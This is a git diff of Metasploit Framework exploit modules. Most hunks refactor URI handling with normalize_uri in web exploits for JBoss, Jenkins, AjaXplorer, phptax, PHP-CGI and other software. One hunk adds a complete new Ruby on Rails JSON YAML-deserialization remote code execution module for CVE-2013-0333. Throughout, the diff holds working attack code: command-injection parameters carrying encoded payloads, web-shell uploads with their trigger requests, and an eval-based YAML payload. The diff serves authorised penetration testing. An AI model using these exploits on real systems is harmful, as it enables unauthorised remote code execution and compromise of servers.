@ -93,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} Uploading payload: #{@payload_name}")
res = send_request_cgi({
'uri' => "#{base}includes/inline_image_upload.php",
'uri' => normalize_uri(base, 'includes/inline_image_upload.php'),
'method' => 'POST',
'ctype' => 'multipart/form-data; boundary=----x',
'data' => post_data

7
modules/exploits/linux/http/webcalendar_settings_exec.rb
View File

@ -73,8 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1, 1] != '/'
uri = target_uri.path
print_status("#{peer} - Housing php payload...")
@ -86,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
post_data << "\n"*2
send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}install/index.php",
'uri' => normalize_uri(uri, 'install/index.php'),
'data' => post_data
})
@ -95,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Execute our payload
send_request_raw({
'method' => 'GET',
'uri' => "#{uri}includes/settings.php",
'uri' => normalize_uri(uri, 'includes/settings.php'),
'headers' => {
'Cmd' => Rex::Text.encode_base64(payload.encoded)
}

10
modules/exploits/linux/http/webid_converter.rb
View File

@ -55,12 +55,12 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'method' => 'GET',
'uri' => uri + "docs/changes.txt"
'uri' => normalize_uri(uri, "docs/changes.txt")
})
if res and res.code == 200 and res.body =~ /1\.0\.2 \- 17\/01\/11/
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"
@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Injecting the PHP payload")
response = send_request_cgi({
'uri' => uri + "converter.php",
'uri' => normalize_uri(uri, "converter.php"),
'method' => "POST",
'vars_post' => {
"action" => "convert",
@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote
timeout = 0.01
response = send_request_cgi({
'uri' => uri + "includes/currencies.php",
'uri' => normalize_uri(uri, "includes/currencies.php"),
'method' => "GET",
'headers' => {
'Connection' => "close",

2
modules/exploits/multi/handler.rb
View File

@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
'BadChars' => '',
'DisableNops' => true,
},
'Platform' => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java' ],
'Platform' => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java','ruby','js','python' ],
'Arch' => ARCH_ALL,
'Targets' => [ [ 'Wildcard Target', { } ] ],
'DefaultTarget' => 0

9
modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
View File

@ -57,13 +57,13 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
clue = Rex::Text::rand_text_alpha(rand(5) + 5)
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}plugins/access.ssh/checkInstall.php",
'uri' => normalize_uri(uri, 'plugins/access.ssh/checkInstall.php'),
'vars_get' => {
'destServer' => "||echo #{clue}"
}
@ -79,13 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path)
uri << '/' if target_uri.path[-1,1] != '/'
uri = target_uri.path
# Trigger the command execution bug
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}plugins/access.ssh/checkInstall.php",
'uri' => normalize_uri(uri, "plugins/access.ssh/checkInstall.php"),
'vars_get' =>
{
'destServer' => "||#{payload.encoded}"

11
modules/exploits/multi/http/apprain_upload_exec.rb
View File

@ -59,12 +59,12 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}addons/uploadify/uploadify.php"
'uri' => normalize_uri(uri, 'addons/uploadify/uploadify.php')
})
if res and res.code == 200 and res.body.empty?
@ -75,8 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
uri = target_uri.path
peer = "#{rhost}:#{rport}"
payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'
@ -91,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Sending PHP payload (#{payload_name})")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}addons/uploadify/uploadify.php",
'uri' => normalize_uri(uri, "addons/uploadify/uploadify.php"),
'ctype' => 'multipart/form-data; boundary=o0oOo0o',
'data' => post_data
})
@ -107,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Execute our payload
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}addons/uploadify/uploads/#{payload_name}"
'uri' => normalize_uri(uri, "addons/uploadify/uploads/#{payload_name}")
})
# If we don't get a 200 when we request our malicious payload, we suspect

11
modules/exploits/multi/http/auxilium_upload_exec.rb
View File

@ -56,11 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
def check
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
uri = target_uri.path
base = File.dirname("#{uri}.")
res = send_request_raw({'uri'=>"#{base}/admin/sitebanners/upload_banners.php"})
res = send_request_raw({
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php")
})
if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
return Exploit::CheckCode::Appears
else
@ -83,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/admin/sitebanners/upload_banners.php",
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
})
@ -94,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
print_status("#{@peer} - Requesting '#{php_fname}'...")
res = send_request_raw({'uri'=>"#{base}/banners/#{php_fname}"})
res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")})
if res and res.code == 404
print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
return

4
modules/exploits/multi/http/axis2_deployer.rb
View File

@ -267,7 +267,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "#{rpath}/axis2-admin/login",
'uri' => normalize_uri(rpath, '/axis2-admin/login'),
'ctype' => 'application/x-www-form-urlencoded',
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
}, 25)
@ -303,7 +303,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "#{rpath}/axis2-admin/login",
'uri' => normalize_uri(rpath, '/axis2-admin/login'),
'ctype' => 'application/x-www-form-urlencoded',
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
}, 25)

6
modules/exploits/multi/http/cuteflow_upload_exec.rb
View File

@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
base << '/' if base[-1, 1] != '/'
res = send_request_raw({
'method' => 'GET',
'uri' => "#{base}"
'uri' => base
})
if res.body =~ /\<strong style\=\"font\-size\:8pt\;font\-weight\:normal\"\>Version 2\.11\.2\<\/strong\>\<br\>/
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
# upload
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}pages/restart_circulation_values_write.php",
'uri' => normalize_uri(base, "pages/restart_circulation_values_write.php"),
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => data_post,
})
@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{@peer} - Retrieving file: #{fname}")
send_request_raw({
'method' => 'GET',
'uri' => "#{base}upload/___1/#{fname}"
'uri' => normalize_uri(base, "upload/___1/#{fname}")
})
handler

4
modules/exploits/multi/http/horde_href_backdoor.rb
View File

@ -59,14 +59,14 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
# Make sure the URI begins with a slash
uri = normalize_uri(datastore['URI'])
uri = datastore['URI']
function = "passthru"
key = Rex::Text.rand_text_alpha(6)
arguments = "echo #{key}`"+payload.raw+"`#{key}"
res = send_request_cgi({
'uri' => uri + "/services/javascript.php",
'uri' => normalize_uri(uri, "/services/javascript.php"),
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'data' => "app="+datastore['APP']+"&file=open_calendar.js",

10
modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
View File

@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Generate an initial JSESSIONID
print_status("#{@peer} - Retrieving an initial JSESSIONID")
res = send_request_cgi(
'uri' => "#{@uri}servlet/Main",
'uri' => normalize_uri(@uri, 'servlet/Main'),
'method' => 'POST'
)
@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{@peer} - Authenticating on HP SiteScope Configuration")
res = send_request_cgi(
{
'uri' => "#{@uri}j_security_check",
'uri' => normalize_uri(@uri, 'j_security_check'),
'method' => 'POST',
'data' => login_data,
'ctype' => "application/x-www-form-urlencoded",
@ -264,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{@peer} - Uploading the JSP")
res = send_request_cgi(
{
'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
'method' => 'POST',
'data' => post_data.to_s,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
@ -285,7 +285,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
send_request_cgi(
{
'uri' => "#{@uri}#{@jsp_name}.jsp",
'uri' => normalize_uri(@uri, "#{@jsp_name}.jsp"),
'method' => 'GET',
'headers' =>
{
@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote
data << "</wsns0:Envelope>" + "\r\n"
res = send_request_cgi({
'uri' => "#{@uri}services/APIPreferenceImpl",
'uri' => normalize_uri(@uri, 'services/APIPreferenceImpl'),
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => data,

6
modules/exploits/multi/http/jboss_bshdeployer.rb
View File

@ -391,7 +391,7 @@ EOT
end
def query_serverinfo
path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
path = normalize_uri(datastore['PATH'], '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo')
res = send_request_raw(
{
'uri' => path,
@ -449,13 +449,13 @@ EOT
if (datastore['VERB']== "POST")
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'data' => params
})
else
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + params
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{params}"
}, 30)
end
res

10
modules/exploits/multi/http/jboss_deploymentfilerepository.rb
View File

@ -277,14 +277,14 @@ EOT
if (datastore['VERB'] == "POST")
res = send_request_cgi(
{
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'method' => datastore['VERB'],
'data' => data
}, 5)
else
res = send_request_cgi(
{
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + data,
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{data}",
'method' => datastore['VERB'],
}, 30)
end
@ -308,14 +308,14 @@ EOT
if (datastore['VERB'] == "POST")
res = send_request_cgi(
{
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'method' => datastore['VERB'],
'data' => data
}, 5)
else
res = send_request_cgi(
{
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor;index.jsp?' + data,
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor;index.jsp') + "?#{data}",
'method' => datastore['VERB'],
}, 30)
end
@ -378,7 +378,7 @@ EOT
def query_serverinfo
path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'
res = send_request_raw(
{
'uri' => path,

8
modules/exploits/multi/http/jboss_maindeployer.rb
View File

@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (datastore['VERB'] == "POST")
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'vars_post' =>
{
'action' => 'invokeOpByName',
@ -189,7 +189,7 @@ class Metasploit3 < Msf::Exploit::Remote
else
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'vars_get' =>
{
'action' => 'invokeOpByName',
@ -275,7 +275,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Undeploying #{app_base} ...")
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'vars_post' =>
{
'action' => 'invokeOpByName',
@ -314,7 +314,7 @@ class Metasploit3 < Msf::Exploit::Remote
def query_serverinfo
path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'
res = send_request_raw(
{
'uri' => path

4
modules/exploits/multi/http/jenkins_script_console.rb
View File

@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
def http_send_command(cmd, opts = {})
request_parameters = {
'method' => 'POST',
'uri' => "#{@uri.path}script",
'uri' => normalize_uri(@uri.path, "script"),
'vars_post' =>
{
'script' => java_craft_runtime_exec(cmd),
@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status('Logging in...')
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{@uri.path}j_acegi_security_check",
'uri' => normalize_uri(@uri.path, "j_acegi_security_check"),
'vars_post' =>
{
'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),

6
modules/exploits/multi/http/log1cms_ajax_create_folder.rb
View File

@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_raw({
'method' => 'GET',
'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php"
'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php")
})
if res and res.code == 200
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)")
send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php",
'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php"),
'data' => php
})
print_status("#{peer} - Requesting data.php")
send_request_raw({
'method' => 'GET',
'uri' => "#{uri}admin/libraries/ajaxfilemanager/inc/data.php"
'uri' => normalize_uri(uri, 'admin/libraries/ajaxfilemanager/inc/data.php')
})
handler

6
modules/exploits/multi/http/mobilecartly_upload_exec.rb
View File

@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
res = send_request_raw({'uri'=>"#{base}/index.php"})
res = send_request_raw({'uri'=>normalize_uri(uri, "/index.php")})
if res and res.body =~ /MobileCartly/
return Exploit::CheckCode::Detected
else
@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
print_status("#{@peer} - Uploading payload")
res = send_request_cgi({
'uri' => "#{base}/includes/savepage.php",
'uri' => normalize_uri(base, "/includes/savepage.php"),
'vars_get' => {
'savepage' => php_fname,
'pagecontent' => get_write_exec_payload(:unlink_self=>true)
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Run payload
#
print_status("#{@peer} - Requesting '#{php_fname}'")
send_request_cgi({ 'uri' => "#{base}/pages/#{php_fname}" })
send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) })
handler
end

2
modules/exploits/multi/http/movabletype_upgrade_exec.rb
View File

@ -98,7 +98,7 @@ class Metasploit4 < Msf::Exploit::Remote
end
def http_send_raw(cmd)
path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi'
path = normalize_uri(target_uri.path, '/mt-upgrade.cgi')
pay = cmd.gsub('\\', '\\\\').gsub('"', '\"')
send_request_cgi(
{

8
modules/exploits/multi/http/openfire_auth_bypass.rb
View File

@ -89,10 +89,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
base = normalize_uri(target_uri.path)
base = target_uri.path
base << '/' if base[-1, 1] != '/'
path = "#{base}login.jsp"
path = normalize_uri(base, "login.jsp")
res = send_request_cgi(
{
'uri' => path
@ -183,7 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
data << "\r\n--#{boundary}--"
res = send_request_cgi({
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin",
'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?uploadplugin"),
'method' => 'POST',
'data' => data,
'headers' =>
@ -201,7 +201,7 @@ class Metasploit3 < Msf::Exploit::Remote
if datastore['REMOVE_PLUGIN']
print_status("Deleting plugin #{plugin_name} from the server")
res = send_request_cgi({
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?deleteplugin=") + plugin_name.downcase,
'headers' =>
{
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",

4
modules/exploits/multi/http/php_cgi_arg_injection.rb
View File

@ -96,11 +96,9 @@ class Metasploit3 < Msf::Exploit::Remote
]
qs = args.join()
uri = normalize_uri(target_uri)
uri = normalize_uri(target_uri.path)
uri = "#{uri}?#{qs}"
#print_status("URI: #{target_uri}?#{qs}") # Uncomment to preview URI
# Has to be all on one line, so gsub out the comments and the newlines
payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
response = send_request_cgi( {

2
modules/exploits/multi/http/php_volunteer_upload_exec.rb
View File

@ -252,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Trying file: #{f}")
send_request_raw({
'method' => 'GET',
'uri' => "#{base}mods/documents/uploads/#{f}",
'uri' => normalize_uri(base, 'mods/documents/uploads/', f),
'cookie' => cookie
})
end

8
modules/exploits/multi/http/phpldapadmin_query_engine.rb
View File

@ -56,9 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'index.php'
uri = normalize_uri(datastore['URI'], 'index.php')
res = send_request_raw(
{
@ -74,9 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def get_session
uri normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'index.php'
uri = normalize_uri(datastore['URI'], 'index.php')
res = send_request_raw(
{

5
modules/exploits/multi/http/phptax_exec.rb
View File

@ -73,13 +73,12 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
uri = target_uri.path
print_status("#{rhost}#{rport} - Sending request...")
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}drawimage.php",
'uri' => normalize_uri(uri, "drawimage.php"),
'vars_get' => {
'pdf' => 'make',
'pfilez' => "xxx; #{payload.encoded}"

8
modules/exploits/multi/http/plone_popen2.rb
View File

@ -61,9 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
res = send_request_raw(
{
@ -77,9 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
send_request_cgi(
{

3
modules/exploits/multi/http/pmwiki_pagelist.rb
View File

@ -73,8 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
header = rand_text_alpha_upper(3)
header_append = rand_text_alpha_upper(4)
uri = normalize_uri(datastore['URI'])
uri += (datastore['URI'][-1, 1] == "/") ? 'pmwiki.php' : '/pmwiki.php'
uri = normalize_uri(datastore['URI'], "pmwiki.php")
res = send_request_cgi({
'method' => 'POST',

8
modules/exploits/multi/http/qdpm_upload_exec.rb
View File

@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
res = send_request_raw({'uri'=>"#{base}/index.php"})
res = send_request_raw({'uri'=>normalize_uri(base, "/index.php")})
if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m
major, minor = $1, $2
return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70
@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Login
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/index.php/home/login",
'uri' => normalize_uri("#{base}/index.php/home/login"),
'vars_post' => {
'login[email]' => username,
'login[password]' => password,
@ -187,7 +187,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/index.php/home/myAccount",
'uri' => normalize_uri("#{base}/index.php/home/myAccount"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie,
@ -205,7 +205,7 @@ class Metasploit3 < Msf::Exploit::Remote
# When we upload a file, it will be renamed. The 'myAccount' page has that info.
res = send_request_cgi({
'uri' => "#{base}/index.php/home/myAccount",
'uri' => normalize_uri("#{base}/index.php/home/myAccount"),
'cookie' => cookie
})

118
modules/exploits/multi/http/rails_json_yaml_code_exec.rb Normal file
View File

@ -0,0 +1,118 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the
JSON request processor of the Ruby on Rails application framework.
This vulnerability allows an attacker to instantiate a remote object,
which in turn can be used to execute any ruby code remotely in the
context of the application. This vulnerability is very similar to
CVE-2013-0156.
This module has been tested successfully on RoR 3.0.9, 3.0.19, and
2.3.15.
The technique used by this module requires the target to be running a
fairly recent version of Ruby 1.9 (since 2011 or so). Applications
using Ruby 1.8 may still be exploitable using the init_with() method,
but this has not been demonstrated.
},
'Author' =>
[
'jjarmoc', # Initial module based on cve-2013-0156, testing help
'egypt', # Module
'lian', # Identified the RouteSet::NamedRouteCollection vector
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-0333'],
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DisclosureDate' => 'Jan 28 2013',
'DefaultOptions' => { "PrependFork" => true },
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ])
], self.class)
end
#
# Create the YAML document that will be embedded into the JSON
#
def build_yaml_rails2
code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
"eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
yaml.gsub(':', '\u003a')
end
#
# Create the YAML document that will be embedded into the JSON
#
def build_yaml_rails3
code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:OpenStruct\n table:\n :defaults: {}\n"
yaml.gsub(':', '\u003a')
end
def build_request(v)
case v
when 2; build_yaml_rails2
when 3; build_yaml_rails3
end
end
#
# Send the actual request
#
def exploit
[2, 3].each do |ver|
print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/json',
'headers' => { 'X-HTTP-Method-Override' => 'get' },
'data' => build_request(ver)
}, 25)
handler
end
end
end

52
modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
View File

@ -10,7 +10,6 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@ -47,14 +46,14 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DisclosureDate' => 'Jan 7 2013',
'DefaultOptions' => { "PrependFork" => true },
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ])
], self.class)
register_evasion_options(
@ -63,35 +62,12 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
#
# This stub ensures that the payload runs outside of the Rails process
# Otherwise, the session can be killed on timeout
#
def detached_payload_stub(code)
%Q^
code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first
if RUBY_PLATFORM =~ /mswin|mingw|win32/
inp = IO.popen("ruby", "wb") rescue nil
if inp
inp.write(code)
inp.close
end
else
if ! Process.fork()
eval(code) rescue nil
end
end
^.strip.split(/\n/).map{|line| line.strip}.join("\n")
end
#
# Create the YAML document that will be embedded into the XML
#
def build_yaml_rails2
# Embed the payload with the detached stub
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
@ -108,8 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
def build_yaml_rails3
# Embed the payload with the detached stub
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
@ -164,24 +139,17 @@ class Metasploit3 < Msf::Exploit::Remote
#
def exploit
print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
res = send_request_cgi({
[2, 3].each do |ver|
print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
send_request_cgi({
'uri' => datastore['URIPATH'] || "/",
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/xml',
'headers' => { 'X-HTTP-Method-Override' => 'get' },
'data' => build_request(3)
}, 25)
handler
print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
res = send_request_cgi({
'uri' => datastore['URIPATH'] || "/",
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/xml',
'headers' => { 'X-HTTP-Method-Override' => 'get' },
'data' => build_request(2)
'data' => build_request(ver)
}, 25)
handler
end
end
end

28
modules/exploits/multi/http/sit_file_upload.rb
View File

@ -64,12 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
uri = normalize_uri(datastore['URI'])
